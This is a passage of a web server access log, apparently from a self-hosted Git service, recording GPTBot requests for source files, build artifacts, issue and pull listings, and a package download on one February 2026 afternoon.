+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42453] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42451] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42453] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12932] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12803] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" -[17/Feb/2026:17:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12525] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=source" [Client 74.7.227.38] [Length 526143] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:17:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 11129] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:17:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fTestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 23507] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:17:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" -[17/Feb/2026:17:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11899] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" -[17/Feb/2026:17:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11315] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" -[17/Feb/2026:17:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11090] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" -[17/Feb/2026:17:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" -[17/Feb/2026:17:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10102] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:17:37:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:37:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10086] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 1521] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr 